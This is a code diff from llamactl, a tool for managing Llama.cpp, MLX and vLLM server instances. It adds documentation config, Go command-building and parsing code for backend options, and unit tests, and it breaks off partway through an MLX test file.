@@ -0,0 +1,79 @@
site_name: Llamactl Documentation
site_description: User documentation for Llamactl - A management tool for Llama.cpp instances
site_author: Llamactl Team
site_url: https://llamactl.org
repo_name: lordmathis/llamactl
repo_url: https://github.com/lordmathis/llamactl
theme:
name: material
palette:
# Palette toggle for light mode
- scheme: default
primary: indigo
accent: indigo
toggle:
icon: material/brightness-7
name: Switch to dark mode
# Palette toggle for dark mode
- scheme: slate
primary: indigo
accent: indigo
toggle:
icon: material/brightness-4
name: Switch to light mode
features:
- navigation.tabs
- navigation.sections
- navigation.expand
- navigation.top
- search.highlight
- search.share
- content.code.copy
markdown_extensions:
- pymdownx.highlight:
anchor_linenums: true
- pymdownx.inlinehilite
- pymdownx.snippets
- pymdownx.superfences
- admonition
- pymdownx.details
- pymdownx.tabbed:
alternate_style: true
- attr_list
- md_in_html
- toc:
permalink: true
nav:
- Home: index.md
- Getting Started:
- Installation: getting-started/installation.md
- Quick Start: getting-started/quick-start.md
- Configuration: getting-started/configuration.md
- User Guide:
- Managing Instances: user-guide/managing-instances.md
- API Reference: user-guide/api-reference.md
- Troubleshooting: user-guide/troubleshooting.md
plugins:
- search
- git-revision-date-localized
- mike:
version_selector: true
css_dir: css
javascript_dir: js
canonical_version: null
hooks:
- docs/readme_sync.py
extra:
version:
provider: mike
default: stable
social:
- icon: fontawesome/brands/github
link: https://github.com/lordmathis/llamactl

pkg/backends/backend.go (new file, 10 lines added)

@@ -0,0 +1,10 @@
package backends
type BackendType string
const (
BackendTypeLlamaCpp BackendType = "llama_cpp"
BackendTypeMlxLm BackendType = "mlx_lm"
BackendTypeVllm BackendType = "vllm"
// BackendTypeMlxVlm BackendType = "mlx_vlm" // Future expansion
)
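These constants are the same `backend_type` string values used in instance creation requests. A minimal, hypothetical usage sketch (the helper below is illustrative and not part of the package):
```go
package main

import (
	"fmt"

	"llamactl/pkg/backends"
)

// isSupported is an illustrative helper that checks whether a backend_type
// string from an API request matches a known backend.
func isSupported(t backends.BackendType) bool {
	switch t {
	case backends.BackendTypeLlamaCpp, backends.BackendTypeMlxLm, backends.BackendTypeVllm:
		return true
	default:
		return false
	}
}

func main() {
	fmt.Println(isSupported(backends.BackendType("llama_cpp"))) // true
	fmt.Println(isSupported(backends.BackendType("unknown")))   // false
}
```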

pkg/backends/builder.go (new file, 93 lines added)

@@ -0,0 +1,93 @@
package backends
import (
"fmt"
"llamactl/pkg/config"
"reflect"
"strconv"
"strings"
)
// BuildCommandArgs converts a struct to command line arguments
func BuildCommandArgs(options any, multipleFlags map[string]bool) []string {
var args []string
v := reflect.ValueOf(options).Elem()
t := v.Type()
for i := 0; i < v.NumField(); i++ {
field := v.Field(i)
fieldType := t.Field(i)
if !field.CanInterface() {
continue
}
jsonTag := fieldType.Tag.Get("json")
if jsonTag == "" || jsonTag == "-" {
continue
}
// Get flag name from JSON tag
flagName := strings.Split(jsonTag, ",")[0]
flagName = strings.ReplaceAll(flagName, "_", "-")
switch field.Kind() {
case reflect.Bool:
if field.Bool() {
args = append(args, "--"+flagName)
}
case reflect.Int:
if field.Int() != 0 {
args = append(args, "--"+flagName, strconv.FormatInt(field.Int(), 10))
}
case reflect.Float64:
if field.Float() != 0 {
args = append(args, "--"+flagName, strconv.FormatFloat(field.Float(), 'f', -1, 64))
}
case reflect.String:
if field.String() != "" {
args = append(args, "--"+flagName, field.String())
}
case reflect.Slice:
if field.Type().Elem().Kind() == reflect.String && field.Len() > 0 {
if multipleFlags[flagName] {
// Multiple flags: --flag value1 --flag value2
for j := 0; j < field.Len(); j++ {
args = append(args, "--"+flagName, field.Index(j).String())
}
} else {
// Comma-separated: --flag value1,value2
var values []string
for j := 0; j < field.Len(); j++ {
values = append(values, field.Index(j).String())
}
args = append(args, "--"+flagName, strings.Join(values, ","))
}
}
}
}
return args
}
// BuildDockerCommand builds a Docker command with the specified configuration and arguments
func BuildDockerCommand(backendConfig *config.BackendSettings, instanceArgs []string) (string, []string, error) {
// Start with configured Docker arguments (should include "run", "--rm", etc.)
dockerArgs := make([]string, len(backendConfig.Docker.Args))
copy(dockerArgs, backendConfig.Docker.Args)
// Add environment variables
for key, value := range backendConfig.Docker.Environment {
dockerArgs = append(dockerArgs, "-e", fmt.Sprintf("%s=%s", key, value))
}
// Add image name
dockerArgs = append(dockerArgs, backendConfig.Docker.Image)
// Add backend args and instance args
dockerArgs = append(dockerArgs, backendConfig.Args...)
dockerArgs = append(dockerArgs, instanceArgs...)
return "docker", dockerArgs, nil
}
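For illustration, a minimal sketch of calling BuildCommandArgs with a hypothetical options struct; the struct, field tags, and values below are not taken from the repository:
```go
package main

import (
	"fmt"

	"llamactl/pkg/backends"
)

// exampleOptions is a hypothetical options struct used only to illustrate how
// json tags (snake_case) map to CLI flags (--kebab-case).
type exampleOptions struct {
	Model   string   `json:"model,omitempty"`
	CtxSize int      `json:"ctx_size,omitempty"`
	Verbose bool     `json:"verbose,omitempty"`
	Lora    []string `json:"lora,omitempty"`
}

func main() {
	opts := &exampleOptions{
		Model:   "/models/example.gguf",
		CtxSize: 2048,
		Verbose: true,
		Lora:    []string{"a.bin", "b.bin"},
	}
	// Marking "lora" as multi-valued yields repeated flags instead of a
	// comma-separated list.
	args := backends.BuildCommandArgs(opts, map[string]bool{"lora": true})
	fmt.Println(args)
	// [--model /models/example.gguf --ctx-size 2048 --verbose --lora a.bin --lora b.bin]
}
```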


@@ -1,12 +1,34 @@
package llamactl
package llamacpp
import (
"encoding/json"
"llamactl/pkg/backends"
"reflect"
"strconv"
"strings"
)
// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated
// Used for both parsing (with underscores) and building (with dashes)
var multiValuedFlags = map[string]bool{
// Parsing keys (with underscores)
"override_tensor": true,
"override_kv": true,
"lora": true,
"lora_scaled": true,
"control_vector": true,
"control_vector_scaled": true,
"dry_sequence_breaker": true,
"logit_bias": true,
// Building keys (with dashes)
"override-tensor": true,
"override-kv": true,
"lora-scaled": true,
"control-vector": true,
"control-vector-scaled": true,
"dry-sequence-breaker": true,
"logit-bias": true,
}
type LlamaServerOptions struct {
// Common params
VerbosePrompt bool `json:"verbose_prompt,omitempty"`
@@ -15,12 +37,12 @@ type LlamaServerOptions struct {
CPUMask string `json:"cpu_mask,omitempty"`
CPURange string `json:"cpu_range,omitempty"`
CPUStrict int `json:"cpu_strict,omitempty"`
Priority int `json:"priority,omitempty"`
Prio int `json:"prio,omitempty"`
Poll int `json:"poll,omitempty"`
CPUMaskBatch string `json:"cpu_mask_batch,omitempty"`
CPURangeBatch string `json:"cpu_range_batch,omitempty"`
CPUStrictBatch int `json:"cpu_strict_batch,omitempty"`
PriorityBatch int `json:"priority_batch,omitempty"`
PrioBatch int `json:"prio_batch,omitempty"`
PollBatch int `json:"poll_batch,omitempty"`
CtxSize int `json:"ctx_size,omitempty"`
Predict int `json:"predict,omitempty"`
@@ -83,7 +105,7 @@ type LlamaServerOptions struct {
Seed int `json:"seed,omitempty"`
SamplingSeq string `json:"sampling_seq,omitempty"`
IgnoreEOS bool `json:"ignore_eos,omitempty"`
Temperature float64 `json:"temperature,omitempty"`
Temperature float64 `json:"temp,omitempty"`
TopK int `json:"top_k,omitempty"`
TopP float64 `json:"top_p,omitempty"`
MinP float64 `json:"min_p,omitempty"`
@@ -110,7 +132,7 @@ type LlamaServerOptions struct {
JSONSchema string `json:"json_schema,omitempty"`
JSONSchemaFile string `json:"json_schema_file,omitempty"`
// Server/Example-specific params
// Example-specific params
NoContextShift bool `json:"no_context_shift,omitempty"`
Special bool `json:"special,omitempty"`
NoWarmup bool `json:"no_warmup,omitempty"`
@@ -150,17 +172,15 @@ type LlamaServerOptions struct {
NoPrefillAssistant bool `json:"no_prefill_assistant,omitempty"`
SlotPromptSimilarity float64 `json:"slot_prompt_similarity,omitempty"`
LoraInitWithoutApply bool `json:"lora_init_without_apply,omitempty"`
// Speculative decoding params
DraftMax int `json:"draft_max,omitempty"`
DraftMin int `json:"draft_min,omitempty"`
DraftPMin float64 `json:"draft_p_min,omitempty"`
CtxSizeDraft int `json:"ctx_size_draft,omitempty"`
DeviceDraft string `json:"device_draft,omitempty"`
GPULayersDraft int `json:"gpu_layers_draft,omitempty"`
ModelDraft string `json:"model_draft,omitempty"`
CacheTypeKDraft string `json:"cache_type_k_draft,omitempty"`
CacheTypeVDraft string `json:"cache_type_v_draft,omitempty"`
DraftMax int `json:"draft_max,omitempty"`
DraftMin int `json:"draft_min,omitempty"`
DraftPMin float64 `json:"draft_p_min,omitempty"`
CtxSizeDraft int `json:"ctx_size_draft,omitempty"`
DeviceDraft string `json:"device_draft,omitempty"`
GPULayersDraft int `json:"gpu_layers_draft,omitempty"`
ModelDraft string `json:"model_draft,omitempty"`
CacheTypeKDraft string `json:"cache_type_k_draft,omitempty"`
CacheTypeVDraft string `json:"cache_type_v_draft,omitempty"`
// Audio/TTS params
ModelVocoder string `json:"model_vocoder,omitempty"`
@@ -199,62 +219,75 @@ func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error {
// Handle alternative field names
fieldMappings := map[string]string{
// Official llama-server short forms from the documentation
"t": "threads", // -t, --threads N
"tb": "threads_batch", // -tb, --threads-batch N
"C": "cpu_mask", // -C, --cpu-mask M
"Cr": "cpu_range", // -Cr, --cpu-range lo-hi
"Cb": "cpu_mask_batch", // -Cb, --cpu-mask-batch M
"Crb": "cpu_range_batch", // -Crb, --cpu-range-batch lo-hi
"c": "ctx_size", // -c, --ctx-size N
"n": "predict", // -n, --predict, --n-predict N
"b": "batch_size", // -b, --batch-size N
"ub": "ubatch_size", // -ub, --ubatch-size N
"fa": "flash_attn", // -fa, --flash-attn
"e": "escape", // -e, --escape
"dkvc": "dump_kv_cache", // -dkvc, --dump-kv-cache
"nkvo": "no_kv_offload", // -nkvo, --no-kv-offload
"ctk": "cache_type_k", // -ctk, --cache-type-k TYPE
"ctv": "cache_type_v", // -ctv, --cache-type-v TYPE
"dt": "defrag_thold", // -dt, --defrag-thold N
"np": "parallel", // -np, --parallel N
"dev": "device", // -dev, --device <dev1,dev2,..>
"ot": "override_tensor", // --override-tensor, -ot
"ngl": "gpu_layers", // -ngl, --gpu-layers, --n-gpu-layers N
"sm": "split_mode", // -sm, --split-mode
"ts": "tensor_split", // -ts, --tensor-split N0,N1,N2,...
"mg": "main_gpu", // -mg, --main-gpu INDEX
"m": "model", // -m, --model FNAME
"mu": "model_url", // -mu, --model-url MODEL_URL
"hf": "hf_repo", // -hf, -hfr, --hf-repo
"hfr": "hf_repo", // -hf, -hfr, --hf-repo
"hfd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft
"hfrd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft
"hff": "hf_file", // -hff, --hf-file FILE
"hfv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v
"hfrv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v
"hffv": "hf_file_v", // -hffv, --hf-file-v FILE
"hft": "hf_token", // -hft, --hf-token TOKEN
"v": "verbose", // -v, --verbose, --log-verbose
"lv": "verbosity", // -lv, --verbosity, --log-verbosity N
"s": "seed", // -s, --seed SEED
"temp": "temperature", // --temp N
"l": "logit_bias", // -l, --logit-bias
"j": "json_schema", // -j, --json-schema SCHEMA
"jf": "json_schema_file", // -jf, --json-schema-file FILE
"sp": "special", // -sp, --special
"cb": "cont_batching", // -cb, --cont-batching
"nocb": "no_cont_batching", // -nocb, --no-cont-batching
"a": "alias", // -a, --alias STRING
"to": "timeout", // -to, --timeout N
"sps": "slot_prompt_similarity", // -sps, --slot-prompt-similarity
"cd": "ctx_size_draft", // -cd, --ctx-size-draft N
"devd": "device_draft", // -devd, --device-draft
"ngld": "gpu_layers_draft", // -ngld, --gpu-layers-draft
"md": "model_draft", // -md, --model-draft FNAME
"ctkd": "cache_type_k_draft", // -ctkd, --cache-type-k-draft TYPE
"ctvd": "cache_type_v_draft", // -ctvd, --cache-type-v-draft TYPE
"mv": "model_vocoder", // -mv, --model-vocoder FNAME
// Common params
"t": "threads", // -t, --threads N
"tb": "threads_batch", // -tb, --threads-batch N
"C": "cpu_mask", // -C, --cpu-mask M
"Cr": "cpu_range", // -Cr, --cpu-range lo-hi
"Cb": "cpu_mask_batch", // -Cb, --cpu-mask-batch M
"Crb": "cpu_range_batch", // -Crb, --cpu-range-batch lo-hi
"c": "ctx_size", // -c, --ctx-size N
"n": "predict", // -n, --predict N
"n-predict": "predict", // --n-predict N
"b": "batch_size", // -b, --batch-size N
"ub": "ubatch_size", // -ub, --ubatch-size N
"fa": "flash_attn", // -fa, --flash-attn
"e": "escape", // -e, --escape
"dkvc": "dump_kv_cache", // -dkvc, --dump-kv-cache
"nkvo": "no_kv_offload", // -nkvo, --no-kv-offload
"ctk": "cache_type_k", // -ctk, --cache-type-k TYPE
"ctv": "cache_type_v", // -ctv, --cache-type-v TYPE
"dt": "defrag_thold", // -dt, --defrag-thold N
"np": "parallel", // -np, --parallel N
"dev": "device", // -dev, --device <dev1,dev2,..>
"ot": "override_tensor", // --override-tensor, -ot
"ngl": "gpu_layers", // -ngl, --gpu-layers, --n-gpu-layers N
"n-gpu-layers": "gpu_layers", // --n-gpu-layers N
"sm": "split_mode", // -sm, --split-mode
"ts": "tensor_split", // -ts, --tensor-split N0,N1,N2,...
"mg": "main_gpu", // -mg, --main-gpu INDEX
"m": "model", // -m, --model FNAME
"mu": "model_url", // -mu, --model-url MODEL_URL
"hf": "hf_repo", // -hf, -hfr, --hf-repo
"hfr": "hf_repo", // -hf, -hfr, --hf-repo
"hfd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft
"hfrd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft
"hff": "hf_file", // -hff, --hf-file FILE
"hfv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v
"hfrv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v
"hffv": "hf_file_v", // -hffv, --hf-file-v FILE
"hft": "hf_token", // -hft, --hf-token TOKEN
"v": "verbose", // -v, --verbose, --log-verbose
"log-verbose": "verbose", // --log-verbose
"lv": "verbosity", // -lv, --verbosity, --log-verbosity N
"log-verbosity": "verbosity", // --log-verbosity N
// Sampling params
"s": "seed", // -s, --seed SEED
"l": "logit_bias", // -l, --logit-bias
"j": "json_schema", // -j, --json-schema SCHEMA
"jf": "json_schema_file", // -jf, --json-schema-file FILE
// Example-specific params
"sp": "special", // -sp, --special
"cb": "cont_batching", // -cb, --cont-batching
"nocb": "no_cont_batching", // -nocb, --no-cont-batching
"a": "alias", // -a, --alias STRING
"embeddings": "embedding", // --embeddings
"rerank": "reranking", // --reranking
"to": "timeout", // -to, --timeout N
"sps": "slot_prompt_similarity", // -sps, --slot-prompt-similarity
"draft": "draft-max", // -draft, --draft-max N
"draft-n": "draft-max", // --draft-n-max N
"draft-n-min": "draft_min", // --draft-n-min N
"cd": "ctx_size_draft", // -cd, --ctx-size-draft N
"devd": "device_draft", // -devd, --device-draft
"ngld": "gpu_layers_draft", // -ngld, --gpu-layers-draft
"n-gpu-layers-draft": "gpu_layers_draft", // --n-gpu-layers-draft N
"md": "model_draft", // -md, --model-draft FNAME
"ctkd": "cache_type_k_draft", // -ctkd, --cache-type-k-draft TYPE
"ctvd": "cache_type_v_draft", // -ctvd, --cache-type-v-draft TYPE
"mv": "model_vocoder", // -mv, --model-vocoder FNAME
}
// Process alternative field names
@@ -304,62 +337,31 @@ func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error {
// BuildCommandArgs converts InstanceOptions to command line arguments
func (o *LlamaServerOptions) BuildCommandArgs() []string {
    // Llama uses multiple flags for arrays by default (not comma-separated)
    // Use package-level multiValuedFlags variable
    return backends.BuildCommandArgs(o, multiValuedFlags)
}
func (o *LlamaServerOptions) BuildDockerArgs() []string {
    // For llama, Docker args are the same as normal args
    return o.BuildCommandArgs()
}
// ParseLlamaCommand parses a llama-server command string into LlamaServerOptions
// Supports multiple formats:
// 1. Full command: "llama-server --model file.gguf"
// 2. Full path: "/usr/local/bin/llama-server --model file.gguf"
// 3. Args only: "--model file.gguf --gpu-layers 32"
// 4. Multiline commands with backslashes
func ParseLlamaCommand(command string) (*LlamaServerOptions, error) {
    executableNames := []string{"llama-server"}
    var subcommandNames []string // Llama has no subcommands
    // Use package-level multiValuedFlags variable
    var llamaOptions LlamaServerOptions
    if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &llamaOptions); err != nil {
        return nil, err
    }
    return &llamaOptions, nil
}
The previous reflection-based implementation, which this change removes:
func (o *LlamaServerOptions) BuildCommandArgs() []string {
    var args []string
    v := reflect.ValueOf(o).Elem()
    t := v.Type()
    for i := 0; i < v.NumField(); i++ {
        field := v.Field(i)
        fieldType := t.Field(i)
        // Skip unexported fields
        if !field.CanInterface() {
            continue
        }
        // Get the JSON tag to determine the flag name
        jsonTag := fieldType.Tag.Get("json")
        if jsonTag == "" || jsonTag == "-" {
            continue
        }
        // Remove ",omitempty" from the tag
        flagName := jsonTag
        if commaIndex := strings.Index(jsonTag, ","); commaIndex != -1 {
            flagName = jsonTag[:commaIndex]
        }
        // Convert snake_case to kebab-case for CLI flags
        flagName = strings.ReplaceAll(flagName, "_", "-")
        // Add the appropriate arguments based on field type and value
        switch field.Kind() {
        case reflect.Bool:
            if field.Bool() {
                args = append(args, "--"+flagName)
            }
        case reflect.Int:
            if field.Int() != 0 {
                args = append(args, "--"+flagName, strconv.FormatInt(field.Int(), 10))
            }
        case reflect.Float64:
            if field.Float() != 0 {
                args = append(args, "--"+flagName, strconv.FormatFloat(field.Float(), 'f', -1, 64))
            }
        case reflect.String:
            if field.String() != "" {
                args = append(args, "--"+flagName, field.String())
            }
        case reflect.Slice:
            if field.Type().Elem().Kind() == reflect.String {
                // Handle []string fields
                for j := 0; j < field.Len(); j++ {
                    args = append(args, "--"+flagName, field.Index(j).String())
                }
            }
        }
    }
    return args
}
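
As an aside (not part of the file above), a minimal sketch of how the new parse/build pair composes, assuming the llamacpp package layout introduced here; the flag order produced by BuildCommandArgs follows struct field order, so the output shown is illustrative only:

package main

import (
    "fmt"
    "llamactl/pkg/backends/llamacpp"
)

func main() {
    // Parse a user-supplied command line into structured options...
    opts, err := llamacpp.ParseLlamaCommand("llama-server --model /models/llama.gguf --gpu-layers 32 --verbose")
    if err != nil {
        panic(err)
    }
    // ...and rebuild CLI arguments from them, e.g.
    // [--model /models/llama.gguf --gpu-layers 32 --verbose]
    fmt.Println(opts.BuildCommandArgs())
}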

View File

@@ -1,17 +1,16 @@
package llamactl_test
package llamacpp_test
import (
"encoding/json"
"fmt"
"llamactl/pkg/backends/llamacpp"
"reflect"
"slices"
"testing"
llamactl "llamactl/pkg"
)
func TestBuildCommandArgs_BasicFields(t *testing.T) {
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
Host: "localhost",
@@ -46,27 +45,27 @@ func TestBuildCommandArgs_BasicFields(t *testing.T) {
func TestBuildCommandArgs_BooleanFields(t *testing.T) {
tests := []struct {
name string
options llamactl.LlamaServerOptions
options llamacpp.LlamaServerOptions
expected []string
excluded []string
}{
{
name: "verbose true",
options: llamactl.LlamaServerOptions{
options: llamacpp.LlamaServerOptions{
Verbose: true,
},
expected: []string{"--verbose"},
},
{
name: "verbose false",
options: llamactl.LlamaServerOptions{
options: llamacpp.LlamaServerOptions{
Verbose: false,
},
excluded: []string{"--verbose"},
},
{
name: "multiple booleans",
options: llamactl.LlamaServerOptions{
options: llamacpp.LlamaServerOptions{
Verbose: true,
FlashAttn: true,
Mlock: false,
@@ -97,7 +96,7 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
}
func TestBuildCommandArgs_NumericFields(t *testing.T) {
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
Port: 8080,
Threads: 4,
CtxSize: 2048,
@@ -110,13 +109,13 @@ func TestBuildCommandArgs_NumericFields(t *testing.T) {
args := options.BuildCommandArgs()
expectedPairs := map[string]string{
"--port": "8080",
"--threads": "4",
"--ctx-size": "2048",
"--gpu-layers": "16",
"--temperature": "0.7",
"--top-k": "40",
"--top-p": "0.9",
"--port": "8080",
"--threads": "4",
"--ctx-size": "2048",
"--gpu-layers": "16",
"--temp": "0.7",
"--top-k": "40",
"--top-p": "0.9",
}
for flag, expectedValue := range expectedPairs {
@@ -127,7 +126,7 @@ func TestBuildCommandArgs_NumericFields(t *testing.T) {
}
func TestBuildCommandArgs_ZeroValues(t *testing.T) {
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
Port: 0, // Should be excluded
Threads: 0, // Should be excluded
Temperature: 0, // Should be excluded
@@ -154,7 +153,7 @@ func TestBuildCommandArgs_ZeroValues(t *testing.T) {
}
func TestBuildCommandArgs_ArrayFields(t *testing.T) {
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
Lora: []string{"adapter1.bin", "adapter2.bin"},
OverrideTensor: []string{"tensor1", "tensor2", "tensor3"},
DrySequenceBreaker: []string{".", "!", "?"},
@@ -179,7 +178,7 @@ func TestBuildCommandArgs_ArrayFields(t *testing.T) {
}
func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
Lora: []string{}, // Empty array should not generate args
OverrideTensor: []string{}, // Empty array should not generate args
}
@@ -196,7 +195,7 @@ func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
func TestBuildCommandArgs_FieldNameConversion(t *testing.T) {
// Test snake_case to kebab-case conversion
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
CtxSize: 4096,
GPULayers: 32,
ThreadsBatch: 2,
@@ -232,10 +231,10 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
"verbose": true,
"ctx_size": 4096,
"gpu_layers": 32,
"temperature": 0.7
"temp": 0.7
}`
var options llamactl.LlamaServerOptions
var options llamacpp.LlamaServerOptions
err := json.Unmarshal([]byte(jsonData), &options)
if err != nil {
t.Fatalf("Unmarshal failed: %v", err)
@@ -268,12 +267,12 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
tests := []struct {
name string
jsonData string
checkFn func(llamactl.LlamaServerOptions) error
checkFn func(llamacpp.LlamaServerOptions) error
}{
{
name: "threads alternatives",
jsonData: `{"t": 4, "tb": 2}`,
checkFn: func(opts llamactl.LlamaServerOptions) error {
checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.Threads != 4 {
return fmt.Errorf("expected threads 4, got %d", opts.Threads)
}
@@ -286,7 +285,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "context size alternatives",
jsonData: `{"c": 2048}`,
checkFn: func(opts llamactl.LlamaServerOptions) error {
checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.CtxSize != 2048 {
return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
}
@@ -296,7 +295,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "gpu layers alternatives",
jsonData: `{"ngl": 16}`,
checkFn: func(opts llamactl.LlamaServerOptions) error {
checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.GPULayers != 16 {
return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
}
@@ -306,7 +305,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "model alternatives",
jsonData: `{"m": "/path/model.gguf"}`,
checkFn: func(opts llamactl.LlamaServerOptions) error {
checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.Model != "/path/model.gguf" {
return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model)
}
@@ -316,7 +315,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "temperature alternatives",
jsonData: `{"temp": 0.8}`,
checkFn: func(opts llamactl.LlamaServerOptions) error {
checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.Temperature != 0.8 {
return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature)
}
@@ -327,7 +326,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
var options llamactl.LlamaServerOptions
var options llamacpp.LlamaServerOptions
err := json.Unmarshal([]byte(tt.jsonData), &options)
if err != nil {
t.Fatalf("Unmarshal failed: %v", err)
@@ -343,7 +342,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
func TestUnmarshalJSON_InvalidJSON(t *testing.T) {
invalidJSON := `{"port": "not-a-number", "invalid": syntax}`
var options llamactl.LlamaServerOptions
var options llamacpp.LlamaServerOptions
err := json.Unmarshal([]byte(invalidJSON), &options)
if err == nil {
t.Error("Expected error for invalid JSON")
@@ -357,7 +356,7 @@ func TestUnmarshalJSON_ArrayFields(t *testing.T) {
"dry_sequence_breaker": [".", "!", "?"]
}`
var options llamactl.LlamaServerOptions
var options llamacpp.LlamaServerOptions
err := json.Unmarshal([]byte(jsonData), &options)
if err != nil {
t.Fatalf("Unmarshal failed: %v", err)
@@ -379,6 +378,121 @@ func TestUnmarshalJSON_ArrayFields(t *testing.T) {
}
}
func TestParseLlamaCommand(t *testing.T) {
tests := []struct {
name string
command string
expectErr bool
}{
{
name: "basic command",
command: "llama-server --model /path/to/model.gguf --gpu-layers 32",
expectErr: false,
},
{
name: "args only",
command: "--model /path/to/model.gguf --ctx-size 4096",
expectErr: false,
},
{
name: "mixed flag formats",
command: "llama-server --model=/path/model.gguf --gpu-layers 16 --verbose",
expectErr: false,
},
{
name: "quoted strings",
command: `llama-server --model test.gguf --api-key "sk-1234567890abcdef"`,
expectErr: false,
},
{
name: "empty command",
command: "",
expectErr: true,
},
{
name: "unterminated quote",
command: `llama-server --model test.gguf --api-key "unterminated`,
expectErr: true,
},
{
name: "malformed flag",
command: "llama-server ---model test.gguf",
expectErr: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result, err := llamacpp.ParseLlamaCommand(tt.command)
if tt.expectErr {
if err == nil {
t.Errorf("expected error but got none")
}
return
}
if err != nil {
t.Errorf("unexpected error: %v", err)
return
}
if result == nil {
t.Errorf("expected result but got nil")
}
})
}
}
func TestParseLlamaCommandValues(t *testing.T) {
command := "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap"
result, err := llamacpp.ParseLlamaCommand(command)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if result.Model != "/test/model.gguf" {
t.Errorf("expected model '/test/model.gguf', got '%s'", result.Model)
}
if result.GPULayers != 32 {
t.Errorf("expected gpu_layers 32, got %d", result.GPULayers)
}
if result.Temperature != 0.7 {
t.Errorf("expected temperature 0.7, got %f", result.Temperature)
}
if !result.Verbose {
t.Errorf("expected verbose to be true")
}
if !result.NoMmap {
t.Errorf("expected no_mmap to be true")
}
}
func TestParseLlamaCommandArrays(t *testing.T) {
command := "llama-server --model test.gguf --lora adapter1.bin --lora=adapter2.bin"
result, err := llamacpp.ParseLlamaCommand(command)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if len(result.Lora) != 2 {
t.Errorf("expected 2 lora adapters, got %d", len(result.Lora))
}
expected := []string{"adapter1.bin", "adapter2.bin"}
for i, v := range expected {
if result.Lora[i] != v {
t.Errorf("expected lora[%d]=%s got %s", i, v, result.Lora[i])
}
}
}
// Helper functions
func contains(slice []string, item string) bool {
return slices.Contains(slice, item)
}
56
pkg/backends/mlx/mlx.go Normal file
View File

@@ -0,0 +1,56 @@
package mlx
import (
"llamactl/pkg/backends"
)
type MlxServerOptions struct {
// Basic connection options
Model string `json:"model,omitempty"`
Host string `json:"host,omitempty"`
Port int `json:"port,omitempty"`
// Model and adapter options
AdapterPath string `json:"adapter_path,omitempty"`
DraftModel string `json:"draft_model,omitempty"`
NumDraftTokens int `json:"num_draft_tokens,omitempty"`
TrustRemoteCode bool `json:"trust_remote_code,omitempty"`
// Logging and templates
LogLevel string `json:"log_level,omitempty"`
ChatTemplate string `json:"chat_template,omitempty"`
UseDefaultChatTemplate bool `json:"use_default_chat_template,omitempty"`
ChatTemplateArgs string `json:"chat_template_args,omitempty"` // JSON string
// Sampling defaults
Temp float64 `json:"temp,omitempty"`
TopP float64 `json:"top_p,omitempty"`
TopK int `json:"top_k,omitempty"`
MinP float64 `json:"min_p,omitempty"`
MaxTokens int `json:"max_tokens,omitempty"`
}
// BuildCommandArgs converts to command line arguments
func (o *MlxServerOptions) BuildCommandArgs() []string {
multipleFlags := map[string]bool{} // MLX doesn't currently have []string fields
return backends.BuildCommandArgs(o, multipleFlags)
}
// ParseMlxCommand parses a mlx_lm.server command string into MlxServerOptions
// Supports multiple formats:
// 1. Full command: "mlx_lm.server --model model/path"
// 2. Full path: "/usr/local/bin/mlx_lm.server --model model/path"
// 3. Args only: "--model model/path --host 0.0.0.0"
// 4. Multiline commands with backslashes
func ParseMlxCommand(command string) (*MlxServerOptions, error) {
executableNames := []string{"mlx_lm.server"}
var subcommandNames []string // MLX has no subcommands
multiValuedFlags := map[string]bool{} // MLX has no multi-valued flags
var mlxOptions MlxServerOptions
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil {
return nil, err
}
return &mlxOptions, nil
}

View File

@@ -0,0 +1,157 @@
package mlx_test
import (
"llamactl/pkg/backends/mlx"
"testing"
)
func TestParseMlxCommand(t *testing.T) {
tests := []struct {
name string
command string
expectErr bool
}{
{
name: "basic command",
command: "mlx_lm.server --model /path/to/model --host 0.0.0.0",
expectErr: false,
},
{
name: "args only",
command: "--model /path/to/model --port 8080",
expectErr: false,
},
{
name: "mixed flag formats",
